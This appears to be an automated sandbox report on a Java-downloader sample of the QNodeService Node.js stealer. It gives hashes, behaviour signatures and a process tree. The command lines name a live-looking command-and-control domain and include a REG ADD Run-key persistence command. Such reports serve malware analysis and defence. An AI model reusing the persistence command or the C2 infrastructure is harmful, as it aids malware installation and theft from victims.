Analysis
- max time kernel: 145s
- max time network: 125s
- platform: windows10_x64
- resource: win10
- submitted: 19-10-2020 10:55
- Static task: static1
- Behavioral task: behavioral1 (sample: fin_bsc_report.jar, resource: win7)
- Behavioral task: behavioral2 (sample: fin_bsc_report.jar, resource: win10)
General
- Target: fin_bsc_report.jar
- Size: 73KB
- MD5: 7447f61327acef94cbdaaaacdc5f7f2d
- SHA1: d831ded9fc308cc53be80d819d33128392fcf962
- SHA256: 47f862b9d75a9190696a0620efddfe7e43b16b79c0b0f009a55ed5360f35b312
- SHA512: 0f4264a0335589b23e1c1a65f6bcbec24d5c4266e5d5d851fa2ad6990300618c7fa4e44ec957e095a9629c6d95175883636d7e7188297387ca21c25372cf8146
Malware Config
Signatures
- QNodeService
  Trojan/stealer written in NodeJS and spread via Java downloader.
- Executes dropped EXE (3 IoCs)
  pid   Process
  1076  node.exe
  900   node.exe
  1160  node.exe
- Loads dropped DLL (6 IoCs)
  pid   Process
  1160  node.exe (6 entries, all from pid 1160)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Adds Run key to start application (2 TTPs, 2 IoCs)
  description      ioc                                                                                                                                          Process
  Key created      \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run                                  reg.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\29732ecc-c047-476e-ad5b-b0041e294f96 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""  reg.exe
- JavaScript code in executable (3 IoCs)
  resource                                        yara_rule
  behavioral2/files/0x000100000001ad87-171.dat    js
  behavioral2/files/0x000100000001ad87-175.dat    js
  behavioral2/files/0x000100000001ad87-179.dat    js
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  17    wtfismyip.com
  18    wtfismyip.com
- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                            Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz           node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  node.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1                node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz           node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString  node.exe
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid   Process
  1076  node.exe (4 entries)
  900   node.exe (4 entries)
  1160  node.exe (10 entries)
- Suspicious use of WriteProcessMemory (12 IoCs; each event is listed twice in the report)
  description                          pid   Process   procid_target
  PID 2928 wrote to memory of 2184     2928  java.exe  76
  PID 2928 wrote to memory of 2184     2928  java.exe  76
  PID 2184 wrote to memory of 1076     2184  javaw.exe 78
  PID 2184 wrote to memory of 1076     2184  javaw.exe 78
  PID 1076 wrote to memory of 900      1076  node.exe  80
  PID 1076 wrote to memory of 900      1076  node.exe  80
  PID 900 wrote to memory of 1160      900   node.exe  81
  PID 900 wrote to memory of 1160      900   node.exe  81
  PID 1160 wrote to memory of 1748     1160  node.exe  83
  PID 1160 wrote to memory of 1748     1160  node.exe  83
  PID 1748 wrote to memory of 3708     1748  cmd.exe   84
  PID 1748 wrote to memory of 3708     1748  cmd.exe   84
Processes (process tree; each entry is a child of the one above it)
- C:\ProgramData\Oracle\Java\javapath\java.exe
  Command line: java -jar C:\Users\Admin\AppData\Local\Temp\fin_bsc_report.jar
  PID: 2928
  - Suspicious use of WriteProcessMemory
  - C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
    Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\cea6dfb4.tmp
    PID: 2184
    - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
      Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain chinpao.hopto.org --hub-domain localhost
      PID: 1076
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_Ilvx95\boot.js --hub-domain chinpao.hopto.org --hub-domain localhost
        PID: 900
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
        - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_Ilvx95\boot.js --hub-domain chinpao.hopto.org --hub-domain localhost
          PID: 1160
          - Executes dropped EXE
          - Loads dropped DLL
          - Checks processor information in registry
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory
          - C:\Windows\system32\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "29732ecc-c047-476e-ad5b-b0041e294f96" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
            PID: 1748
            - Suspicious use of WriteProcessMemory
            - C:\Windows\system32\reg.exe
              Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "29732ecc-c047-476e-ad5b-b0041e294f96" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
              PID: 3708
              - Adds Run key to start application